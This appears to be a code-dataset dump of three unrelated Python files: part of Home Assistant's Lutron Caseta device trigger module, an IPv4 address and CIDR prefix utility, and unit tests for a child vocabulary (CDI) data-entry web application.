"stop_2": 19,
"close_2": 20,
"raise_2": 21,
"lower_2": 22,
"open_3": 26,
"stop_3": 27,
"close_3": 28,
"raise_3": 29,
"lower_3": 30,
"open_4": 34,
"stop_4": 35,
"close_4": 36,
"raise_4": 37,
"lower_4": 38,
}
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA = LUTRON_BUTTON_TRIGGER_SCHEMA.extend(
{
vol.Required(CONF_SUBTYPE): vol.In(FOUR_GROUP_REMOTE_BUTTON_TYPES),
}
)
DEVICE_TYPE_SCHEMA_MAP = {
"Pico2Button": PICO_2_BUTTON_TRIGGER_SCHEMA,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico3Button": PICO_3_BUTTON_TRIGGER_SCHEMA,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
"Pico4Button": PICO_4_BUTTON_TRIGGER_SCHEMA,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
"FourGroupRemote": FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
}
DEVICE_TYPE_SUBTYPE_MAP = {
"Pico2Button": PICO_2_BUTTON_BUTTON_TYPES,
"Pico2ButtonRaiseLower": PICO_2_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico3Button": PICO_3_BUTTON_BUTTON_TYPES,
"Pico3ButtonRaiseLower": PICO_3_BUTTON_RAISE_LOWER_BUTTON_TYPES,
"Pico4Button": PICO_4_BUTTON_BUTTON_TYPES,
"Pico4ButtonScene": PICO_4_BUTTON_SCENE_BUTTON_TYPES,
"Pico4ButtonZone": PICO_4_BUTTON_ZONE_BUTTON_TYPES,
"Pico4Button2Group": PICO_4_BUTTON_2_GROUP_BUTTON_TYPES,
"FourGroupRemote": FOUR_GROUP_REMOTE_BUTTON_TYPES,
}
TRIGGER_SCHEMA = vol.Any(
PICO_2_BUTTON_TRIGGER_SCHEMA,
PICO_3_BUTTON_RAISE_LOWER_TRIGGER_SCHEMA,
PICO_4_BUTTON_TRIGGER_SCHEMA,
PICO_4_BUTTON_SCENE_TRIGGER_SCHEMA,
PICO_4_BUTTON_ZONE_TRIGGER_SCHEMA,
PICO_4_BUTTON_2_GROUP_TRIGGER_SCHEMA,
FOUR_GROUP_REMOTE_TRIGGER_SCHEMA,
)
async def async_validate_trigger_config(hass: HomeAssistant, config: ConfigType):
"""Validate config."""
# if device is available verify parameters against device capabilities
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
if not device:
return config
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
if not schema:
raise InvalidDeviceAutomationConfig(
f"Device type {device['type']} not supported: {config[CONF_DEVICE_ID]}"
)
return schema(config)
async def async_get_triggers(
hass: HomeAssistant, device_id: str
) -> list[dict[str, Any]]:
"""List device triggers for lutron caseta devices."""
triggers = []
device = get_button_device_by_dr_id(hass, device_id)
if not device:
raise InvalidDeviceAutomationConfig(f"Device not found: {device_id}")
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"], [])
for trigger in SUPPORTED_INPUTS_EVENTS_TYPES:
for subtype in valid_buttons:
triggers.append(
{
CONF_PLATFORM: "device",
CONF_DEVICE_ID: device_id,
CONF_DOMAIN: DOMAIN,
CONF_TYPE: trigger,
CONF_SUBTYPE: subtype,
}
)
return triggers
async def async_attach_trigger(
hass: HomeAssistant,
config: ConfigType,
action: AutomationActionType,
automation_info: AutomationTriggerInfo,
) -> CALLBACK_TYPE:
"""Attach a trigger."""
device = get_button_device_by_dr_id(hass, config[CONF_DEVICE_ID])
schema = DEVICE_TYPE_SCHEMA_MAP.get(device["type"])
valid_buttons = DEVICE_TYPE_SUBTYPE_MAP.get(device["type"])
config = schema(config)
event_config = {
event_trigger.CONF_PLATFORM: CONF_EVENT,
event_trigger.CONF_EVENT_TYPE: LUTRON_CASETA_BUTTON_EVENT,
event_trigger.CONF_EVENT_DATA: {
ATTR_SERIAL: device["serial"],
ATTR_BUTTON_NUMBER: valid_buttons[config[CONF_SUBTYPE]],
ATTR_ACTION: config[CONF_TYPE],
},
}
event_config = event_trigger.TRIGGER_SCHEMA(event_config)
return await event_trigger.async_attach_trigger(
hass, event_config, action, automation_info, platform_type="device"
)
def get_button_device_by_dr_id(hass: HomeAssistant, device_id: str):
"""Get a lutron device for the given device id."""
if DOMAIN not in hass.data:
return None
for config_entry in hass.data[DOMAIN]:
button_devices = hass.data[DOMAIN][config_entry][BUTTON_DEVICES]
device = button_devices.get(device_id)
if device:
return device
return None
|
Danielhiversen/home-assistant
|
homeassistant/components/lutron_caseta/device_trigger.py
|
Python
|
apache-2.0
| 8,121 | 0.000739 |
# Copyright 2020 John Hanley.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# The software is provided "AS IS", without warranty of any kind, express or
# implied, including but not limited to the warranties of merchantability,
# fitness for a particular purpose and noninfringement. In no event shall
# the authors or copyright holders be liable for any claim, damages or
# other liability, whether in an action of contract, tort or otherwise,
# arising from, out of or in connection with the software or the use or
# other dealings in the software.
from functools import lru_cache, total_ordering
import re
@total_ordering
class IpAddr:
"""Models an IPv4 32-bit address."""
dotted_quad_re = re.compile(r"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$")
def __init__(self, dotted_quad):
if isinstance(dotted_quad, IpAddr):
dotted_quad = dotted_quad.decimal()
m = self.dotted_quad_re.search(dotted_quad)
assert m, dotted_quad # Input must be a valid decimal IPv4 address.
four_bytes = map(int, dotted_quad.split("."))
self.addr = self._combine(four_bytes)
@staticmethod
def _combine(nums):
acc = 0
for num in nums:
assert 0 <= num < 0x100, num
acc *= 0x100
acc += num
return acc
def _get_addr_bytes(self):
a = self.addr
bytes = []
for _ in range(4):
bytes.append(a & 0xFF)
a //= 0x100
return reversed(bytes)
def __str__(self):
return f"{self.addr:08x}"
def hex(self):
return self.__str__()
def decimal(self):
return ".".join(map(str, self._get_addr_bytes()))
def decimal03(self):
"""Returns e.g. 001.002.003.004. Lexical and numeric collations match."""
return ".".join([f"{b:03d}"
for b in self._get_addr_bytes()])
# from https://docs.python.org/3/library/functools.html#functools.total_ordering
@staticmethod
def _is_valid_operand(other):
return (hasattr(other, "addr")
and isinstance(other.addr, int)
and other.addr >= 0)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
return None # We can keep going.
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or self.addr == other.addr
def __lt__(self, other):
return self._invalid(other) or self.addr < other.addr
@total_ordering
class Prefix:
"""Models an IPv4 CIDR prefix: 32-bit address + mask."""
def __init__(self, ip: IpAddr, masklen=None):
if isinstance(ip, str) and "/" in ip:
ip, masklen = ip.split("/")
self.masklen = int(masklen)
assert 0 <= self.masklen <= 32, masklen
self.ip = IpAddr(ip)
self.ip.addr &= self.mask() # Canonicalize. Host part must be all zero.
def __str__(self):
return self.ip.decimal() + f"/{self.masklen}"
@staticmethod
@lru_cache()
def _mask(masklen: int):
# net_bits = masklen # network part, e.g. 24 in a class C
# host_bits = 32 - net_bits # host part, e.g. 8 in a class C
net_mask = 0
bit_val = 2 ** 32 # Start with MSB.
for _ in range(masklen):
bit_val //= 2 # Right shift one position.
net_mask |= bit_val
return net_mask
def mask(self):
return self._mask(self.masklen)
def __contains__(self, item: IpAddr):
a1 = self.ip.addr & self.mask()
a2 = item.addr & self.mask()
return a1 == a2
@staticmethod
def _is_valid_operand(other): # Other is a prefix that has an IP, and a mask.
return (hasattr(other, 'ip')
and IpAddr._is_valid_operand(other.ip)
and hasattr(other, 'masklen')
and 0 <= other.masklen <= 32)
@classmethod
def _invalid(cls, other):
if cls._is_valid_operand(other):
return None # We can keep going.
else:
return NotImplemented # Prohibit further processing.
def __eq__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) == (other.ip.addr, other.masklen)
def __lt__(self, other):
return self._invalid(other) or (self.ip.addr, self.masklen) < (other.ip.addr, other.masklen)
def log_dist(a: IpAddr, b: IpAddr):
"""Finds the distance beween IPs, according to a logarithmic distance metric."""
prefix = Prefix(b, 32)
while (prefix.masklen > 0
and a not in prefix):
assert b in prefix, (b, prefix)
prefix.masklen -= 1
assert b in prefix, (b, prefix)
assert a in prefix, (a, prefix)
assert 0 <= prefix.masklen <= 32
log_distance = 32 - prefix.masklen
return log_distance
|
jhanley634/testing-tools
|
problem/weblog/prefix/ip_addr.py
|
Python
|
mit
| 5,425 | 0.00129 |
"""Automated tests for entering CDI forms manually.
Copyright (C) 2014 A. Samuel Pottinger ("Sam Pottinger", gleap.org)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
# Do not type check in tests
# type: ignore
import collections
import copy
import datetime
import json
import unittest
import unittest.mock
import cdibase
from ..struct import models
from ..util import constants
from ..util import db_util
from ..util import filter_util
from ..util import math_util
from ..util import recalc_util
from ..util import user_util
TEST_EMAIL = 'test.email@example.com'
TEST_DB_ID = '1'
TEST_USER = models.User(
TEST_DB_ID,
TEST_EMAIL,
None,
True,
False,
False,
False,
False,
False,
False,
False
)
MALE_TEST_PERCENTILE_NAME = 'male_test_percentiles'
FEMALE_TEST_PERCENTILE_NAME = 'female_test_percentiles'
OTHER_TEST_PERCENTILE_NAME = 'other_test_percentiles'
TEST_CDI_FORMAT_NAME = 'standard'
TEST_FORMAT = models.CDIFormat(
'standard',
'standard',
'standard.yaml',
{
'categories': [
{
'words':['cat_1_word_1', 'cat_1_word_2', 'cat_1_word_3'],
'language': 'english'
},
{
'words':['cat_2_word_1', 'cat_2_word_2', 'cat_2_word_3'],
'language': 'english'
}
],
'percentiles': {
'male': MALE_TEST_PERCENTILE_NAME,
'female': FEMALE_TEST_PERCENTILE_NAME,
'other': OTHER_TEST_PERCENTILE_NAME
},
'options': [
{'name': 'said', 'value': 1},
{'name': 'not said', 'value': 0}
],
'count_as_spoken': [1],
'meta': {'cdi_type': 'standard'}
}
)
TEST_STUDY_ID = '456'
TEST_STUDY_ID_2 = '789'
TEST_SNAPSHOT_ID = 789
TEST_ITEMS_EXCLUDED = 3
TEST_EXTRA_CATEGORIES = 4
TEST_SESSION_NUM = 4
TEST_LANGUAGES = ['english']
TEST_NUM_LANGUAGES = 1
TEST_HARD_OF_HEARING = False
TEST_STUDY = 'test study'
TEST_STUDY_2 = 'test study 2'
TEST_BIRTHDAY = '2011/09/12'
TEST_BIRTHDAY_DATE = datetime.date(2011, 9, 12)
TEST_SESSION = '2013/09/12'
TEST_TOTAL_NUM_SESSIONS = 48
TEST_AGE = 21
TEST_PERCENTILE = 50
TEST_PERCENTILE_MODEL_CLS = collections.namedtuple(
'TestPercentileModel',
['details']
)
TEST_PERCENTILE_MODEL = TEST_PERCENTILE_MODEL_CLS('test details')
TEST_SUCCESSFUL_PARAMS = {
'global_id': TEST_DB_ID,
'study_id': TEST_STUDY_ID,
'study': TEST_STUDY,
'gender': constants.MALE,
'age': TEST_AGE,
'birthday': TEST_BIRTHDAY,
'session_date': TEST_SESSION,
'session_num': TEST_SESSION_NUM,
'items_excluded': TEST_ITEMS_EXCLUDED,
'extra_categories': TEST_EXTRA_CATEGORIES,
'total_num_sessions': TEST_TOTAL_NUM_SESSIONS,
'hard_of_hearing': 'off',
'cat_1_word_1_report': '1',
'cat_1_word_2_report': '0',
'cat_1_word_3_report': '1',
'cat_2_word_1_report': '0',
'cat_2_word_2_report': '1',
'cat_2_word_3_report': '0'
}
TEST_EXPECTED_SNAPSHOT = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID,
TEST_STUDY,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_SNAPSHOT_2 = models.SnapshotMetadata(
None,
TEST_DB_ID,
TEST_STUDY_ID_2,
TEST_STUDY_2,
constants.MALE,
TEST_AGE,
TEST_BIRTHDAY,
TEST_SESSION,
TEST_SESSION_NUM,
TEST_TOTAL_NUM_SESSIONS,
3,
TEST_ITEMS_EXCLUDED,
TEST_PERCENTILE,
TEST_EXTRA_CATEGORIES,
0,
TEST_LANGUAGES,
TEST_NUM_LANGUAGES,
'standard',
constants.EXPLICIT_FALSE,
False
)
TEST_EXPECTED_WORD_ENTRIES = {
'cat_1_word_1': 1,
'cat_1_word_2': 0,
'cat_1_word_3': 1,
'cat_2_word_1': 0,
'cat_2_word_2': 1,
'cat_2_word_3': 0
}
class EnterDataControllersTests(unittest.TestCase):
def setUp(self):
self.app = cdibase.app
self.app.debug = True
self.__callback_called = False
def __run_with_mocks(self, on_start, body, on_end):
with unittest.mock.patch('prog_code.util.user_util.get_user') as mock_get_user:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model') as mock_load_cdi_model:
with unittest.mock.patch('prog_code.util.db_util.insert_snapshot') as mock_insert_snapshot:
with unittest.mock.patch('prog_code.util.db_util.report_usage') as mock_report_usage:
with unittest.mock.patch('prog_code.util.db_util.load_percentile_model') as mock_load_percentile_model:
with unittest.mock.patch('prog_code.util.math_util.find_percentile') as mock_find_percentile:
with unittest.mock.patch('prog_code.util.filter_util.run_search_query') as mock_run_search_query:
with unittest.mock.patch('prog_code.util.db_util.lookup_global_participant_id') as mock_lookup_global_participant_id:
with unittest.mock.patch('prog_code.util.db_util.update_participant_metadata') as mock_update_participant_metadata:
with unittest.mock.patch('prog_code.util.recalc_util.recalculate_ages_and_percentiles') as mock_recalculate_ages_and_percentiles:
with unittest.mock.patch('prog_code.util.db_util.load_cdi_model_listing') as mock_load_cdi_model_listing:
mocks = {
'get_user': mock_get_user,
'load_cdi_model': mock_load_cdi_model,
'insert_snapshot': mock_insert_snapshot,
'report_usage': mock_report_usage,
'load_percentile_model': mock_load_percentile_model,
'find_percentile': mock_find_percentile,
'run_search_query': mock_run_search_query,
'lookup_global_participant_id': mock_lookup_global_participant_id,
'update_participant_metadata': mock_update_participant_metadata,
'recalculate_ages_and_percentiles': mock_recalculate_ages_and_percentiles,
'load_cdi_model_listing': mock_load_cdi_model_listing
}
on_start(mocks)
body()
on_end(mocks)
self.__callback_called = True
def __default_on_start(self, mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].return_value = TEST_FORMAT
def __default_on_end(self, mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_called_with(TEST_CDI_FORMAT_NAME)
def __run_with_default_mocks(self, body):
self.__run_with_mocks(
lambda mocks: self.__default_on_start(mocks),
body,
lambda mocks: self.__default_on_end(mocks),
)
def __assert_callback(self):
self.assertTrue(self.__callback_called)
def check_lookup_studies_metadata(self, returned_metadata):
"""Run assertions that the provided metadata matches the test snapshot.
@param returned_metadata: The metadata to check.
@type returned_metadata: dict
"""
self.assertEqual(
returned_metadata['gender'],
TEST_EXPECTED_SNAPSHOT.gender
)
self.assertEqual(
returned_metadata['birthday'],
TEST_EXPECTED_SNAPSHOT.birthday
)
self.assertEqual(
returned_metadata['hard_of_hearing'],
TEST_EXPECTED_SNAPSHOT.hard_of_hearing
)
self.assertEqual(
returned_metadata['languages'],
TEST_EXPECTED_SNAPSHOT.languages
)
def test_format_for_enter_data(self):
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
client.get(url)
with client.session_transaction() as sess:
err = sess.get(constants.ERROR_ATTR, None)
self.assertEqual(err, None)
url = '/base/enter_data/%s' % 'invalid format'
client.get(url)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
def on_start(mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].side_effect = [
TEST_FORMAT,
None
]
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_any_call(TEST_CDI_FORMAT_NAME)
mocks['load_cdi_model'].assert_any_call('invalid format')
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_missing_enter_data_params(self):
def body():
target_url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['study_id']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['study']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['gender']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['age']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['birthday']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['session_date']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['session_num']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['items_excluded']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['extra_categories']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
del test_params['total_num_sessions']
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
self.__run_with_default_mocks(body)
self.__assert_callback()
def test_invalid_enter_data_params(self):
def body():
target_url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['gender'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['age'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['birthday'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['session_date'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['session_num'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['items_excluded'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['extra_categories'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
test_params = copy.copy(TEST_SUCCESSFUL_PARAMS)
test_params['total_num_sessions'] = 'invalid'
client.post(target_url, data=test_params)
with client.session_transaction() as sess:
self.assertTrue(constants.ERROR_ATTR in sess)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(confirmation_attr, None)
del sess[constants.ERROR_ATTR]
self.__run_with_default_mocks(body)
self.__assert_callback()
def test_success_enter_data(self):
def body():
target_url = '/base/enter_data/%s' % TEST_CDI_FORMAT_NAME
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
client.post(target_url, data=TEST_SUCCESSFUL_PARAMS)
with client.session_transaction() as sess:
error_attr = sess.get(constants.ERROR_ATTR, None)
confirmation_attr = sess.get(constants.CONFIRMATION_ATTR, None)
self.assertEqual(error_attr, None)
self.assertNotEqual(confirmation_attr, None)
def on_start(mocks):
mocks['get_user'].return_value = TEST_USER
mocks['load_cdi_model'].return_value = TEST_FORMAT
mocks['load_percentile_model'].return_value = TEST_PERCENTILE_MODEL
mocks['find_percentile'].return_value = TEST_PERCENTILE
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['load_cdi_model'].assert_called_with(TEST_CDI_FORMAT_NAME)
mocks['load_percentile_model'].assert_called_with(
MALE_TEST_PERCENTILE_NAME
)
mocks['find_percentile'].assert_called_with(
'test details',
3,
TEST_AGE,
6
)
mocks['report_usage'].assert_called_with(
'test.email@example.com',
'Enter Data',
unittest.mock.ANY
)
mocks['insert_snapshot'].assert_called_with(
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_WORD_ENTRIES
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_lookup_studies_by_global_id(self):
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
lookup_user_data = {
'method': 'by_global_id',
'global_id': TEST_DB_ID
}
result_info = client.post(
'/base/edit_data/lookup_user',
data=lookup_user_data
)
result = json.loads(result_info.data)
returned_global_id = result['global_id']
returned_studies = result['cdis']
self.assertEqual(returned_global_id, TEST_DB_ID)
self.assertEqual(len(returned_studies), 2)
if returned_studies[0]['study'] == TEST_STUDY:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID_2)
else:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID_2)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID)
self.check_lookup_studies_metadata(result['metadata'])
def on_start(mocks):
ret_list = [
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_SNAPSHOT_2
]
mocks['get_user'].return_value = TEST_USER
mocks['run_search_query'].return_value = ret_list
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['run_search_query'].assert_called_with(
[models.Filter('child_id', 'eq', TEST_DB_ID)],
constants.SNAPSHOTS_DB_TABLE
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_lookup_studies_by_study_id(self):
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
lookup_user_data = {
'method': 'by_study_id',
'study': TEST_STUDY,
'study_id': TEST_STUDY_ID
}
result_info = client.post(
'/base/edit_data/lookup_user',
data=lookup_user_data
)
result = json.loads(result_info.data)
returned_global_id = result['global_id']
returned_studies = result['cdis']
self.assertEqual(returned_global_id, TEST_DB_ID)
self.assertEqual(len(returned_studies), 2)
if returned_studies[0]['study'] == TEST_STUDY:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID_2)
else:
self.assertEqual(returned_studies[0]['study'], TEST_STUDY_2)
self.assertEqual(returned_studies[0]['study_id'], TEST_STUDY_ID_2)
self.assertEqual(returned_studies[1]['study'], TEST_STUDY)
self.assertEqual(returned_studies[1]['study_id'], TEST_STUDY_ID)
self.check_lookup_studies_metadata(result['metadata'])
def on_start(mocks):
ret_list = [
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_SNAPSHOT_2
]
mocks['get_user'].return_value = TEST_USER
mocks['lookup_global_participant_id'].return_value = TEST_DB_ID
mocks['run_search_query'].return_value = ret_list
def on_end(mocks):
mocks['get_user'].assert_called_with(TEST_EMAIL)
mocks['lookup_global_participant_id'].assert_called_with(
TEST_STUDY,
TEST_STUDY_ID
)
mocks['run_search_query'].assert_called_with(
[models.Filter('child_id', 'eq', TEST_DB_ID)],
constants.SNAPSHOTS_DB_TABLE
)
self.__run_with_mocks(on_start, body, on_end)
self.__assert_callback()
def test_edit_metadata(self):
self.__new_birthday = '2014/12/28'
self.__new_languages = ['english', 'spanish']
self.__ret_list = [
TEST_EXPECTED_SNAPSHOT,
TEST_EXPECTED_SNAPSHOT_2,
]
def body():
with self.app.test_client() as client:
with client.session_transaction() as sess:
sess['email'] = TEST_EMAIL
new_metadata = {
'global_id': TEST_DB_ID,
'gender': constants.FEMALE,
'birthday': self.__new_birthday,
'hard_of_hearing': constants.EXPLICIT_TRUE,
'languages': ','.join(self.__new_languages),
'snapshot_ids': json.dumps([
{'study': TEST_STUDY, 'id': '1'},
{'study': TEST_STUDY_2, 'id': '2'}
])
}
client.post(
'/base/edit_data',
data=new_metadata
)
def on_start(mocks):
mocks['get_user'].return_value = TEST_USER
mocks['run_search_query'].return_value = self.__ret_list
def on_end(mocks):
mocks['get_user'].assert_called_with(
TEST_EMAIL
)
mocks['report_usage'].assert_called_with(
'test.email@example.com',
'Update Metadata',
'{"global_id": "1"}'
)
mocks['update_participant_metadata'].assert_called_with(
TEST_DB_ID,
constants.FEMALE,
self.__new_birthday,
constants.EXPLICIT_TRUE,
self.__new_languages,
snapshot_ids=[
{'study': TEST_STUDY, 'id': '1'},
{'study': TEST_STUDY_2, 'id': '2'}
]
)
mocks['run_search_query'].assert_called_with(
[models.Filter('child_id', 'eq', TEST_DB_ID)],
constants.SNAPSHOTS_DB_TABLE
)
mocks['recalculate_ages_and_percentiles'].assert_called_with(
self.__ret_list
)
self.__run_with_mocks(on_start, body, on_end)
